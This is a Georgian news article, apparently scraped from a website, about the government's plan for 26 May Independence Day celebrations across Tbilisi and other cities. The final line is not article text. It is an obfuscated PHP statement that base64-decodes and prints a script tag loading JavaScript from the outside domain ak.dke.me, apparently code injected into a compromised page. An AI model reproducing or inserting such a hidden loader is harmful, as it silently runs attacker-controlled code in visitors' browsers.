gorgia
ავერსი jaluzi

მთავრობამ 26 მაისისადმი მიძღვნილი ღონისძიებების ორგანიზების გეგმა დაამტკიცა. შესაბამისი განკარგულება 15 აპრილით თარიღდება.

როგორც სამოქმედო გეგმიდან ირკვევა, წელსაც თბილისსა და სხვა ქალაქებში საზეიმო ღონისძიებებია დაგეგმილი. საქართველოს თავდაცვის სამინისტროს ორგანიზებით, თავისუფლების მოედანზე და ხუთ მუნიციპალიტეტში ფიცის დადების საზეიმო ღონისძიება გაიმართება.

ამასთან, როგორც ჩანს, მთავარი საგამოფენო სივრცე, წელს, რუსთაველის გამზირის ნაცვლად, ალექსანდრეს ბაღი, ორბელიანის ქუჩასა და მიმდებარე ტერიტორიაზე მოეწყობა. კერძოდ, როგორც განკარგულების ტექსტშია აღნიშნული, დაგეგმილია ორბელიანის ქუჩასა და მიმდებარე ტერიტორიაზე შემეცნებითი-გასართობი სივრცეების მოწყობა. 17:10 საათზე, როდესაც გამოცხადდა საქართველოს დამოუკიდებლობა, დაგეგმილია პრეზიდენტის სასახლესთან და მის მიმდებარე ტერიტორიაზე საზეიმო აღნიშვნა.

თბილისი დროშებითა და ბანერებით გაფორმდება, მოირთვება 9 აპრილის სახელობის ბაღი. განათდება თბილისის ანძა და მშვიდობის ხიდიც საქართველოს დროშის ფერებში.

თბილისში დაგეგმილია გალა-კონცერტიც.

პარალელურად, საგამოფენო სივრცეების მოწყობა და საზეიმო ღონისძიებები ფოთში, გორში, ზუგდიდში, ქუთაისში, თელავში, ახალციხეში, რუსთავში, მესტიაში, ოზურგეთში, მარნეულში, ახალქალაქში, მცხეთაში, ამბროლაურშიც გაიმართება.

საქართველოს რკინიგზას კი დაევალა 17:10 საათზე ჰიმნის გაჟღერება როგორც სადგურებზე, ასევე მატარებელში, ხოლო მგზავრებისთვის სიმბოლური ბრენდირებული ნივთების და სუვენირების დარიგება.

113
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");